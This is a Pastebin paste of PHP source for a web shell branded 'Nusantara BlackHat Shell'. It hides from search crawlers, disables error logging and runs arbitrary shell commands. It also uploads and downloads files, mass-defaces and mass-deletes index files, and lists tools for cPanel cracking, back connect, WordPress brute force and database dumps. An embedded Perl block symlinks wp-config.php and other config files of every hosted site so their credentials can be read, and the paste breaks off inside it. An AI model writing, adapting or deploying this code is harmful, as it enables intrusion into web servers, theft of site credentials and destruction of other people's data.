poys

N45HT

Jan 9th, 2018
716
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 131.50 KB | None | 0 0
  1. @set_magic_quotes_runtime(0);
  2. @clearstatcache();
  3. @ini_set('error_log',NULL);
  4. @ini_set('log_errors',0);
  5. @ini_set('max_execution_time',0);
  6. @ini_set('output_buffering',0);
  7. @ini_set('display_errors', 0);
  8.  
  9. $color = "#00ff00";
  10. $default_action = 'FilesMan';
  11. $default_use_ajax = true;
  12. $default_charset = 'UTF-8';
  13. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  14.     $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  15.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  16.         header('HTTP/1.0 404 Not Found');
  17.         exit;
  18.     }
  19. }
  20.  
  21. function login_shell() {
  22. ?>
  23. <html>
  24. <head>
  25. <title>Nusantara BlackHat Shell</title>
  26. <link href='http://img.deusm.com/darkreading/bh-asia-facebook-profile.png' rel='icon' type='image/x-icon'/>
  27.  
  28. <style type="text/css">
  29. html {
  30.     margin: 20px auto;
  31.     background: #000000;
  32.     color: lime;
  33.     text-align: center;
  34. }
  35. header {
  36.     color: Dimgray;
  37.     margin: 10px auto;
  38. }
  39. input[type=password] {
  40.     width: 250px;
  41.     height: 25px;
  42.     color: Dimgray;
  43.     background: #000000;
  44.     border: 1px dotted lime;
  45.     padding: 5px;
  46.     margin-left: 20px;
  47.     text-align: center;
  48. }
  49. </style>
  50. </head>
  51. <body>
  52. <center>
  53. <link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css">
  54.  
  55. <style type="text/css">
  56.  
  57. </style>
  58. <br>
  59.           <p><img style="width:290px;" src="http://img.deusm.com/darkreading/bh-asia-facebook-profile.png" border="0"></p>
  60.    <br>      <font color="white" face="iceland" size="8"><b>Nusantara<font color="Dimgray"> BlackHat</font></b><br>
  61. <form method="post">
  62. <input type="password" name="pass">
  63. </form>
  64. <?php
  65. exit;
  66. }
  67. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  68.     if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  69.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  70.     else
  71.         login_shell();
  72. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  73.     @ob_clean();
  74.     $file = $_GET['file'];
  75.     header('Content-Description: File Transfer');
  76.     header('Content-Type: application/octet-stream');
  77.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
  78.     header('Expires: 0');
  79.     header('Cache-Control: must-revalidate');
  80.     header('Pragma: public');
  81.     header('Content-Length: ' . filesize($file));
  82.     readfile($file);
  83.     exit;
  84. }
  85. ?>
  86. <html>
  87. <head>
  88. <title>Nusantara BlackHat Shell</title>
  89. <link href='http://img.deusm.com/darkreading/bh-asia-facebook-profile.png' rel='icon' type='image/x-icon'/>
  90. <meta name='author' content='Nusantara BlackHat'>
  91. <meta charset="UTF-8">
  92. <style type='text/css'>
  93. @import url(http://fonts.googleapis.com/css?family=Share+Tech+Mono);
  94. html {
  95.     background: #000000;
  96.     color: #ffffff;
  97.     font-family: 'Share Tech Mono';
  98.     font-size: 12px;
  99.     width: 100%;
  100. }
  101. li {
  102.     display: inline;
  103.     margin: 1px;
  104.     padding: 1px;
  105. }
  106.  
  107.  #menu{
  108.     background:#111111;
  109.     margin:9px 3px 4px 2px;
  110. }
  111. #menu a{
  112.     padding:4px 19px;
  113.     margin:0;
  114.     background:#222222;
  115.     text-decoration:none;
  116.     letter-spacing:2px;
  117.     -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
  118.  
  119. }
  120. #menu a:hover{
  121.     background:#191919;
  122.     border-bottom:1px solid #333333;
  123.     border-top:1px solid #333333;
  124. }
  125. .explore tr:hover{background:#181818}
  126. table tr:first-child{  
  127.     background: #191919;
  128.     text-align: center;
  129.     color: white;
  130. }
  131. table, th, td {
  132.     border-collapse:collapse;
  133.     font-family: Tahoma, Geneva, sans-serif;
  134.     background: transparent;
  135.     font-family: 'Share Tech Mono';
  136.     font-size: 13px;
  137. }
  138. .table_home, .th_home, .td_home {
  139.     border: 1px solid #191919;
  140. }
  141. th {
  142.     padding: 10px;
  143. }
  144. a {
  145.     color: #ffffff;
  146.     text-decoration: none;
  147. }
  148. a:hover {
  149.     color: dimgray;
  150.     text-decoration: underline;
  151. }
  152. b {
  153.     color: dimgray;
  154. }
  155. input[type=text], input[type=password],input[type=submit] {
  156.     background: transparent;
  157.     color: #ffffff;
  158.     border: 1px solid #ffffff;
  159.     margin: 5px auto;
  160.     padding-left: 5px;
  161.     font-family: 'Share Tech Mono';
  162.     font-size: 13px;
  163. }
  164. input[type=submit] {
  165.     background: #191919;
  166.     color: #ffffff;
  167.     border: 1px solid #ffffff;
  168.     margin: 5px auto;
  169.     padding-left: 5px;
  170.     font-family: 'Share Tech Mono';
  171.     font-size: 13px;
  172.     cursor:pointer;
  173. }
  174. textarea {
  175.     border: 1px solid #ffffff;
  176.     width: 100%;
  177.     height: 400px;
  178.     padding-left: 5px;
  179.     margin: 10px auto;
  180.     resize: none;
  181.     background: transparent;
  182.     color: #ffffff;
  183.     font-family: 'Share Tech Mono';
  184.     font-size: 13px;
  185. }
  186. select {
  187.     width: 152px;
  188.     background: #000000;
  189.     color: dimgray;
  190.     border: 1px solid #ffffff;
  191.     margin: 5px auto;
  192.     padding-left: 5px;
  193.     font-family: 'Share Tech Mono';
  194.     font-size: 13px;
  195. }
  196. option:hover {
  197.     background: dimgray;
  198.     color: #000000;
  199. }
  200. .mybox{-moz-border-radius: 10px; border-radius: 10px;border:1px solid #ff0000; padding:4px 2px;width:70%;line-height:24px;background:none;box-shadow: 0px 4px 2px white;-webkit-box-shadow: 0px 4px 2px #ff0000;-moz-box-shadow: 0px 4px 2px #ff0000;}
  201. .cgx2 {text-align: center;letter-spacing:1px;font-family: "orbitron";color: #ff0000;font-size:25px;text-shadow: 5px 5px 5px black;}
  202. .infoweb {
  203.     border-right: 1px solid #00FFFF;
  204. }
  205.  
  206. </style>
  207. </head>
  208. <?php
  209. ###############################################################################
  210.  
  211. ###############################################################################
  212. function w($dir,$perm) {
  213.     if(!is_writable($dir)) {
  214.         return "<font color=red>".$perm."</font>";
  215.     } else {
  216.         return "<font color=lime>".$perm."</font>";
  217.     }
  218. }
  219. function r($dir,$perm) {
  220.     if(!is_readable($dir)) {
  221.         return "<font color=red>".$perm."</font>";
  222.     } else {
  223.         return "<font color=lime>".$perm."</font>";
  224.     }
  225. }
  226. function exe($cmd) {
  227.     if(function_exists('system')) {        
  228.         @ob_start();      
  229.         @system($cmd);    
  230.         $buff = @ob_get_contents();        
  231.         @ob_end_clean();      
  232.         return $buff;  
  233.     } elseif(function_exists('exec')) {        
  234.         @exec($cmd,$results);      
  235.         $buff = "";        
  236.         foreach($results as $result) {        
  237.             $buff .= $result;      
  238.         } return $buff;    
  239.     } elseif(function_exists('passthru')) {        
  240.         @ob_start();      
  241.         @passthru($cmd);      
  242.         $buff = @ob_get_contents();        
  243.         @ob_end_clean();      
  244.         return $buff;  
  245.     } elseif(function_exists('shell_exec')) {      
  246.         $buff = @shell_exec($cmd);    
  247.         return $buff;  
  248.     }
  249. }
  250. function perms($file){
  251.     $perms = fileperms($file);
  252.     if (($perms & 0xC000) == 0xC000) {
  253.     // Socket
  254.     $info = 's';
  255.     } elseif (($perms & 0xA000) == 0xA000) {
  256.     // Symbolic Link
  257.     $info = 'l';
  258.     } elseif (($perms & 0x8000) == 0x8000) {
  259.     // Regular
  260.     $info = '-';
  261.     } elseif (($perms & 0x6000) == 0x6000) {
  262.     // Block special
  263.     $info = 'b';
  264.     } elseif (($perms & 0x4000) == 0x4000) {
  265.     // Directory
  266.     $info = 'd';
  267.     } elseif (($perms & 0x2000) == 0x2000) {
  268.     // Character special
  269.     $info = 'c';
  270.     } elseif (($perms & 0x1000) == 0x1000) {
  271.     // FIFO pipe
  272.     $info = 'p';
  273.     } else {
  274.     // Unknown
  275.     $info = 'u';
  276.     }
  277.         // Owner
  278.     $info .= (($perms & 0x0100) ? 'r' : '-');
  279.     $info .= (($perms & 0x0080) ? 'w' : '-');
  280.     $info .= (($perms & 0x0040) ?
  281.     (($perms & 0x0800) ? 's' : 'x' ) :
  282.     (($perms & 0x0800) ? 'S' : '-'));
  283.     // Group
  284.     $info .= (($perms & 0x0020) ? 'r' : '-');
  285.     $info .= (($perms & 0x0010) ? 'w' : '-');
  286.     $info .= (($perms & 0x0008) ?
  287.     (($perms & 0x0400) ? 's' : 'x' ) :
  288.     (($perms & 0x0400) ? 'S' : '-'));
  289.     // World
  290.     $info .= (($perms & 0x0004) ? 'r' : '-');
  291.     $info .= (($perms & 0x0002) ? 'w' : '-');
  292.     $info .= (($perms & 0x0001) ?
  293.     (($perms & 0x0200) ? 't' : 'x' ) :
  294.     (($perms & 0x0200) ? 'T' : '-'));
  295.     return $info;
  296. }
  297. function hdd($s) {
  298.     if($s >= 1073741824)
  299.     return sprintf('%1.2f',$s / 1073741824 ).' GB';
  300.     elseif($s >= 1048576)
  301.     return sprintf('%1.2f',$s / 1048576 ) .' MB';
  302.     elseif($s >= 1024)
  303.     return sprintf('%1.2f',$s / 1024 ) .' KB';
  304.     else
  305.     return $s .' B';
  306. }
  307. function ambilKata($param, $kata1, $kata2){
  308.     if(strpos($param, $kata1) === FALSE) return FALSE;
  309.     if(strpos($param, $kata2) === FALSE) return FALSE;
  310.     $start = strpos($param, $kata1) + strlen($kata1);
  311.     $end = strpos($param, $kata2, $start);
  312.     $return = substr($param, $start, $end - $start);
  313.     return $return;
  314. }
  315. function getsource($url) {
  316.     $curl = curl_init($url);
  317.             curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  318.             curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  319.             curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  320.             curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  321.     $content = curl_exec($curl);
  322.             curl_close($curl);
  323.     return $content;
  324. }
  325. function bing($dork) {
  326.     $npage = 1;
  327.     $npages = 30000;
  328.     $allLinks = array();
  329.     $lll = array();
  330.     while($npage <= $npages) {
  331.         $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
  332.         if($x) {
  333.             preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  334.             foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  335.             $npage = $npage + 10;
  336.             if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  337.         } else break;
  338.     }
  339.     $URLs = array();
  340.     foreach($allLinks as $url){
  341.         $exp = explode("/", $url);
  342.         $URLs[] = $exp[2];
  343.     }
  344.     $array = array_filter($URLs);
  345.     $array = array_unique($array);
  346.     $sss = count(array_unique($array));
  347.     foreach($array as $domain) {
  348.         echo $domain."\n";
  349.     }
  350. }
  351. function reverse($url) {
  352.     $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  353.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  354.           curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket=");
  355.           curl_setopt($ch, CURLOPT_HEADER, 0);
  356.           curl_setopt($ch, CURLOPT_POST, 1);
  357.     $resp = curl_exec($ch);
  358.     $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  359.     $array = explode(",,", $resp);
  360.     unset($array[0]);
  361.     foreach($array as $lnk) {
  362.         $lnk = "http://$lnk";
  363.         $lnk = str_replace(",", "", $lnk);
  364.         echo $lnk."\n";
  365.         ob_flush();
  366.         flush();
  367.     }
  368.         curl_close($ch);
  369. }
  370. if(get_magic_quotes_gpc()) {
  371.     function idx_ss($array) {
  372.         return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  373.     }
  374.     $_POST = idx_ss($_POST);
  375.     $_COOKIE = idx_ss($_COOKIE);
  376. }
  377.  
  378. if(isset($_GET['dir'])) {
  379.     $dir = $_GET['dir'];
  380.     chdir($dir);
  381. } else {
  382.     $dir = getcwd();
  383. }
  384. $kernel = php_uname();
  385. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  386. $dir = str_replace("\\","/",$dir);
  387. $scdir = explode("/", $dir);
  388. $freespace = hdd(disk_free_space("/"));
  389. $total = hdd(disk_total_space("/"));
  390. $used = $total - $freespace;
  391. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
  392. $ds = @ini_get("disable_functions");
  393. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  394. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  395. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  396. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  397. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  398. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  399. if(!function_exists('posix_getegid')) {
  400.     $user = @get_current_user();
  401.     $uid = @getmyuid();
  402.     $gid = @getmygid();
  403.     $group = "?";
  404. } else {
  405.     $uid = @posix_getpwuid(posix_geteuid());
  406.     $gid = @posix_getgrgid(posix_getegid());
  407.     $user = $uid['name'];
  408.     $uid = $uid['uid'];
  409.     $group = $gid['name'];
  410.     $gid = $gid['gid'];
  411. }
  412. echo "System: <font color=lime>".$kernel."</font><br>";
  413. echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
  414. echo "Server IP: <font color=lime>".$ip."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>";
  415. echo "HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
  416. echo "Safe Mode: $sm<br>";
  417. echo "Disable Functions: $show_ds<br>";
  418. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
  419. echo "<hr>";
  420. echo "<center>";
  421. echo "<br><link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'><font face='iceland'size='7'>Nusantara_</font><font face='iceland' size='7' color='Dimgray'>BlackHat</font>";
  422. echo "<ul><font face='iceland' size='3.8' color='dimgray'>";
  423.  
  424. echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?'>Home</a> </li>";
  425. echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=upload'>Upload</a> </li>";
  426. echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=cmd'>Command</a> </li>";
  427. echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=mass_deface'>Mass Deface</a> </li>";
  428. echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=mass_delete'>Mass Delete</a> </li>";
  429. echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=config'>Config</a> </li>";
  430. echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=jumping'>Jumping</a> </li>";
  431. echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=cpanel'>CPanel Crack</a> </li>";
  432. echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=smtp'>SMTP Grabber</a> </li>";
  433. echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=zoneh'>Zone-H</a> </li>";
  434. echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=cgi'>CGI Telnet</a> </li>";
  435. echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=network'>network</a> </li>";
  436. echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=adminer'>Adminer</a> </li>";
  437. echo "<p>";
  438. echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=fake_root'>Fake Root</a> </li>";
  439. echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> </li>";
  440. echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> </li>";
  441. echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> </li>";
  442. echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> </li>";
  443. echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> </li>";
  444. echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a> </li>";
  445. echo "<p>";
  446. echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=defacerid'>DefacerID</a> </li>";
  447. echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=csrf'>CSRF Online</a> </li>";
  448. echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=backconnect'>Back Connect</a> </li>";
  449. echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=wpbf'>WordPress Brute</a> </li>";
  450. echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=hashid'>Hash Identification</a> </li>";
  451. echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=symlink'>Symlink</a> </li>";
  452. echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=passwbypass'>Bypass Etc/Passw</a> </li>";
  453. echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=dbdump'>DB Dump</a> </li>";
  454. echo "<li> <a style='border:2px solid darkred;width:80px;padding:0px 8px 0px 8px;' href='?logout=true'>Logout</a> </li><p>";
  455.  
  456. echo "<font size'5'>Current DIR: ";
  457. foreach($scdir as $c_dir => $cdir) {  
  458.     echo "<a href='?dir=";
  459.     for($i = 0; $i <= $c_dir; $i++) {
  460.         echo $scdir[$i];
  461.         if($i != $c_dir) {
  462.         echo "/";
  463.         }
  464.     }
  465.     echo "'>$cdir</a>/";
  466. }
  467. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
  468. echo "</font></ul>";
  469. echo "</center>";
  470. echo "<hr>";
  471. if($_GET['logout'] == true) {
  472.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  473.     echo "<script>window.location='?';</script>";
  474. } elseif($_GET['do'] == 'upload') {
  475.     echo "<center>";
  476.     if($_POST['upload']) {
  477.         if($_POST['tipe_upload'] == 'biasa') {
  478.             if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  479.                 $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  480.             } else {
  481.                 $act = "<font color=red>failed to upload file</font>";
  482.             }
  483.         } else {
  484.             $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  485.             $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  486.             if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  487.                 if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  488.                     $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  489.                 } else {
  490.                     $act = "<font color=red>failed to upload file</font>";
  491.                 }
  492.             } else {
  493.                 $act = "<font color=red>failed to upload file</font>";
  494.             }
  495.         }
  496.     }
  497.     echo "Upload File:
  498.    <form method='post' enctype='multipart/form-data'>
  499.    <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
  500.    <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  501.    <input type='file' name='ix_file'>
  502.    <input type='submit' value='upload' name='upload'>
  503.    </form>";
  504.     echo $act;
  505.     echo "</center>";
  506. } elseif($_GET['do'] == 'cmd') {
  507.     echo "<form method='post'>
  508.    <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
  509.    <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  510.    </form>";
  511.     if($_POST['do_cmd']) {
  512.         echo "<pre>".exe($_POST['cmd'])."</pre>";
  513.     }
  514. } elseif($_GET['do'] == 'mass_deface') {
  515.     function sabun_massal($dir,$namafile,$isi_script) {
  516.         if(is_writable($dir)) {
  517.             $dira = scandir($dir);
  518.             foreach($dira as $dirb) {
  519.                 $dirc = "$dir/$dirb";
  520.                 $lokasi = $dirc.'/'.$namafile;
  521.                 if($dirb === '.') {
  522.                     file_put_contents($lokasi, $isi_script);
  523.                 } elseif($dirb === '..') {
  524.                     file_put_contents($lokasi, $isi_script);
  525.                 } else {
  526.                     if(is_dir($dirc)) {
  527.                         if(is_writable($dirc)) {
  528.                             echo "[<font color=lime>DONE</font>] $lokasi<br>";
  529.                             file_put_contents($lokasi, $isi_script);
  530.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
  531.                         }
  532.                     }
  533.                 }
  534.             }
  535.         }
  536.     }
  537.     function sabun_biasa($dir,$namafile,$isi_script) {
  538.         if(is_writable($dir)) {
  539.             $dira = scandir($dir);
  540.             foreach($dira as $dirb) {
  541.                 $dirc = "$dir/$dirb";
  542.                 $lokasi = $dirc.'/'.$namafile;
  543.                 if($dirb === '.') {
  544.                     file_put_contents($lokasi, $isi_script);
  545.                 } elseif($dirb === '..') {
  546.                     file_put_contents($lokasi, $isi_script);
  547.                 } else {
  548.                     if(is_dir($dirc)) {
  549.                         if(is_writable($dirc)) {
  550.                             echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
  551.                             file_put_contents($lokasi, $isi_script);
  552.                         }
  553.                     }
  554.                 }
  555.             }
  556.         }
  557.     }
  558.     if($_POST['start']) {
  559.         if($_POST['tipe_sabun'] == 'mahal') {
  560.             echo "<div style='margin: 5px auto; padding: 5px'>";
  561.             sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  562.             echo "</div>";
  563.         } elseif($_POST['tipe_sabun'] == 'murah') {
  564.             echo "<div style='margin: 5px auto; padding: 5px'>";
  565.             sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  566.             echo "</div>";
  567.         }
  568.     } else {
  569.     echo "<center>";
  570.     echo "<form method='post'>
  571.    <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
  572.    <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
  573.    <font style='text-decoration: underline;'>Folder:</font><br>
  574.    <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  575.    <font style='text-decoration: underline;'>Filename:</font><br>
  576.    <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  577.    <font style='text-decoration: underline;'>Index File:</font><br>
  578.    <textarea name='script' style='width: 450px; height: 200px;'>Hacked by Nusantara BlackHat</textarea><br>
  579.    <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  580.    </form></center>";
  581.     }
  582. } elseif($_GET['do'] == 'mass_delete') {
  583.     function hapus_massal($dir,$namafile) {
  584.         if(is_writable($dir)) {
  585.             $dira = scandir($dir);
  586.             foreach($dira as $dirb) {
  587.                 $dirc = "$dir/$dirb";
  588.                 $lokasi = $dirc.'/'.$namafile;
  589.                 if($dirb === '.') {
  590.                     if(file_exists("$dir/$namafile")) {
  591.                         unlink("$dir/$namafile");
  592.                     }
  593.                 } elseif($dirb === '..') {
  594.                     if(file_exists("".dirname($dir)."/$namafile")) {
  595.                         unlink("".dirname($dir)."/$namafile");
  596.                     }
  597.                 } else {
  598.                     if(is_dir($dirc)) {
  599.                         if(is_writable($dirc)) {
  600.                             if(file_exists($lokasi)) {
  601.                                 echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  602.                                 unlink($lokasi);
  603.                                 $idx = hapus_massal($dirc,$namafile);
  604.                             }
  605.                         }
  606.                     }
  607.                 }
  608.             }
  609.         }
  610.     }
  611.     if($_POST['start']) {
  612.         echo "<div style='margin: 5px auto; padding: 5px'>";
  613.         hapus_massal($_POST['d_dir'], $_POST['d_file']);
  614.         echo "</div>";
  615.     } else {
  616.     echo "<center>";
  617.     echo "<form method='post'>
  618.    <font style='text-decoration: underline;'>Folder:</font><br>
  619.    <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  620.    <font style='text-decoration: underline;'>Filename:</font><br>
  621.    <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  622.    <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
  623.    </form></center>";
  624.     }
  625. } elseif($_GET['do'] == 'config') {
  626.     $idx = mkdir("nb_config", 0777);
  627.     $isi_htc = "Options FollowSymLinks MultiViews Indexes ExecCGInRequire NonenSatisfy AnynAddType application/x-httpd-cgi .cinnAddHandler cgi-script .cinnAddHandler cgi-script .cin";
  628.     $htc = fopen("nb_config/.htaccess","w");
  629.     fwrite($htc, $isi_htc);
  630.     fclose($htc);
  631.     if(preg_match("/vhosts|vhost/", $dir)) {
  632.         $link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  633.         $vhost = "#!/usr/bin/perl -I/usr/local/bandmin
opendir(my $dir , "/var/www/vhosts/");
foreach(sort readdir $dir) {
    my $isDir = 0;
    $isDir = 1 if -d $_;
$sitess = $_;


symlink('/var/www/vhosts/'.$sitess.'/httpdocs/includes/configure.php',$sitess.'-shop.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/os/includes/configure.php',$sitess.'-shop-os.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/oscom/includes/configure.php',$sitess.'-oscom.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/oscommerce/includes/configure.php',$sitess.'-oscommerce.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/oscommerces/includes/configure.php',$sitess.'-oscommerces.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/shop/includes/configure.php',$sitess.'-shop2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/shopping/includes/configure.php',$sitess.'-shop-shopping.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/sale/includes/configure.php',$sitess.'-sale.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/amember/config.inc.php',$sitess.'-amember.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config.inc.php',$sitess.'-amember2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/members/configuration.php',$sitess.'-members.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config.php',$sitess.'-4images1.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forum/includes/config.php',$sitess.'-forum.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forums/includes/config.php',$sitess.'-forums.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/admin/conf.php',$sitess.'-5.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/admin/config.php',$sitess.'-4.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wp/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/WP/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wp/beta/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/beta/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/press/wp-config.php',$sitess.'-wp13-press.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wordpress/wp-config.php',$sitess.'-wordpress.txt');
